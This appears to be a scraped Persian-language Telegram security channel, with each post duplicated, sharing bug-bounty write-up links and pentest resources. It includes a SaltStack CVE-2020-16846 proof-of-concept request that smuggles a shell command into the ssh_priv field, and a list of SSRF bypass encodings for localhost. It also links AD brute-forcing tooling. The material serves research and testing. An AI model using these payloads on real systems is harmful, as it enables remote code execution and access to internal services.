اکسپلویت آسیب پذیری saltstack
CVE-2020-16846
PoC:
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
#rce
#saltstack
@sec_nerd
CVE-2020-16846
PoC:
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
#rce
#saltstack
@sec_nerd
رایت آپ کشف باگ ssrf به ارزش ۳۱ هزار دلار در سرویس مانیتورینگ ابر گوگل
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#bugbounty
#google
#ssrf
@sec_nerd
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#bugbounty
#ssrf
@sec_nerd
رایت آپ کشف باگ در مسنجر فیسبوک که منجر به لو دادن اکسس توکن های میلیونها کاربر میشود
https://medium.com/@guhanraja/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3
#bugbounty
#writeup
#facebook
@sec_nerd
https://medium.com/@guhanraja/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3
#bugbounty
#writeup
@sec_nerd
شناسایی و بروت فورس حسابهای active directory با kerbrute
https://github.com/ropnop/kerbrute
#AD
#windows
#privesc
@sec_nerd
https://github.com/ropnop/kerbrute
#AD
#windows
#privesc
@sec_nerd
GitHub
GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing
A tool to perform Kerberos pre-auth bruteforcing. Contribute to ropnop/kerbrute development by creating an account on GitHub.
ترکیب سه آسیب پذیری برای تصاحب اکانت
SSRF-->Cloudflare bypass--> Rate limiting to account takeover.
https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304
#writeup
#ssrf
@sec_nerd
SSRF-->Cloudflare bypass--> Rate limiting to account takeover.
https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304
#writeup
#ssrf
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
دور زدن محدودیت های redirect با هفت روش
https://elmahdi.tistory.com/4
#openredirect
#bugbounty
#pentest
@sec_nerd
https://elmahdi.tistory.com/4
#openredirect
#bugbounty
#pentest
@sec_nerd
ElMahdi - マハディ
Bypassing the Redirect filters with 7 ways
Hello Bug Bounty Hunters, In this writeup I will be explaining various scenarios on how to bypass Open Redirect Filters that will lead to Open Redirect> ATO [0x01] Bypass the OAUTH Protection Via Path-URI Open redirect: I already reported a report about simple…
یک منبع مناسب برای تهیه wordlist با هدفهای متنوع
https://wordlists.assetnote.io/
#wordlist
#fuzz
#pentest
@sec_nerd
https://wordlists.assetnote.io/
#wordlist
#fuzz
#pentest
@sec_nerd
یک رساله دکترا در خصوص تولید اکسپلویت
Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters
https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf
توضیحات مختصر
https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/
#overflow
#exploit
@sec_nerd
Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters
https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf
توضیحات مختصر
https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/
#overflow
#exploit
@sec_nerd
فایرفاکس اندروید به وبسایتها اجازه میدهد تمام کوکی های شما را بدست آورند
https://medium.com/bugbountywriteup/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d
#android
#firefox
@sec_nerd
https://medium.com/bugbountywriteup/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d
#android
#firefox
@sec_nerd
Medium
Firefox: How a website could steal all your cookies
This is a write up for CVE-2020–15647, explaining how webpages are capable of stealing files from your Android device, including but not…
تزریق شل در imageMagick
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
این آسیب پذیری در بروزرسانی اخیر imageMagick برطرف شده است.
#imagemagick
#rce
@sec_nerd
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
این آسیب پذیری در بروزرسانی اخیر imageMagick برطرف شده است.
#imagemagick
#rce
@sec_nerd
Blogspot
ImageMagick - Shell injection via PDF password
"Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) includ...
دور زدن فایروال akamai و اجرای حمله ی SSTI
https://cyc10n3.medium.com/rce-via-server-side-template-injection-ad46f8e0c2ae
#ssti
#rce
#akamai
@sec_nerd
https://cyc10n3.medium.com/rce-via-server-side-template-injection-ad46f8e0c2ae
#ssti
#rce
#akamai
@sec_nerd
Turning Blind Error Based SQL Injection into Exploitable Boolean One
https://ozguralp.medium.com/turning-blind-error-based-sql-injection-into-an-exploitable-boolean-one-85d6be3ca23b
#sqli
#pentest
@sec_nerd
https://ozguralp.medium.com/turning-blind-error-based-sql-injection-into-an-exploitable-boolean-one-85d6be3ca23b
#sqli
#pentest
@sec_nerd
Medium
Turning Blind Error Based SQL Injection Into An Exploitable Boolean One
While I was recently hunting on a promising host target, from my well configured (only checking SQLi) active scan results, I found out a…
ضعف در تنظیم REGEX منجر به حمله SSRF در یک پکیج npm با ۱۲ هزار نصب شد
https://johnjhacking.com/blog/cve-2020-28360/
#ssrf
#pentest
@sec_nerd
https://johnjhacking.com/blog/cve-2020-28360/
#ssrf
#pentest
@sec_nerd
Johnjhacking
CVE-2020-28360: npm private-ip SSRF Bypass (IP Phone Home)
Versions of npm private-ip including and prior to 1.0.5 are vulnerable to multiple Server Side Request Forgery (SSRF) bypasses. Implemented Regular Expression (RegEx) within the package fail to account for variations of localhost and other Private IP ranges.…
استفاده غیرامن از تابع unserialize در فریمورک zend منجر به RCE میشود
https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38
#php
#poi
#rce
@sec_nerd
https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38
#php
#poi
#rce
@sec_nerd
رتبه بندی ده زبان برتر برنامه نویسی که توسعه دهندگان علاقه بیشتری به آنها داشته اند در سال ۲۰۲۰
1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript
https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved
#dev
@sec_nerd
1 Rust lang
2 TypeScript
3 Python
4 Kotlin
5 Go
6 Julia
7 Dart
8 C#
9 Swift
10 JavaScript
https://insights.stackoverflow.com/survey/2020?#technology-most-loved-dreaded-and-wanted-languages-loved
#dev
@sec_nerd
نتایج اسکن کل اینترنت برای پورت ۴۴۳ که توسط یک فرد نیکوکار انجام شده
https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs
#scan
#enum
@sec_nerd
https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs
#scan
#enum
@sec_nerd
mega.nz
985.13 MB file on MEGA
SSRF Bypass list for localhost (127.0.0.1):
https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01
https://⑯⑨。②⑤④。⑯⑨。②⑤④/
https://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
https://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
https://②⑧⑤②⓪③⑨①⑥⑥:80/
https://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
https://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
https://0xd8.0x3a.0xd6.0xe3
https://0xd83ad6e3
https://0xd8.0x3ad6e3
https://0xd8.0x3a.0xd6e3
https://0330.072.0326.0343
https://000330.0000072.0000326.00000343
https://033016553343
https://3627734755
https://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
https://216.0x3a.00000000326.0xe3
localtest.iss.one
https://newyork.localtest.iss.one
https://mysite.localtest.iss.one
https://redirecttest.localtest.iss.one
sub1.sub2.sub3.localtest.iss.one
https://bugbounty.dod.network
https://spoofed.burpcollaborator.net
#ssrf
#bugbounty
#pentest
@sec_nerd
https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01
https://⑯⑨。②⑤④。⑯⑨。②⑤④/
https://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
https://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
https://②⑧⑤②⓪③⑨①⑥⑥:80/
https://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
https://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
https://0xd8.0x3a.0xd6.0xe3
https://0xd83ad6e3
https://0xd8.0x3ad6e3
https://0xd8.0x3a.0xd6e3
https://0330.072.0326.0343
https://000330.0000072.0000326.00000343
https://033016553343
https://3627734755
https://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
https://216.0x3a.00000000326.0xe3
localtest.iss.one
https://newyork.localtest.iss.one
https://mysite.localtest.iss.one
https://redirecttest.localtest.iss.one
sub1.sub2.sub3.localtest.iss.one
https://bugbounty.dod.network
https://spoofed.burpcollaborator.net
#ssrf
#bugbounty
#pentest
@sec_nerd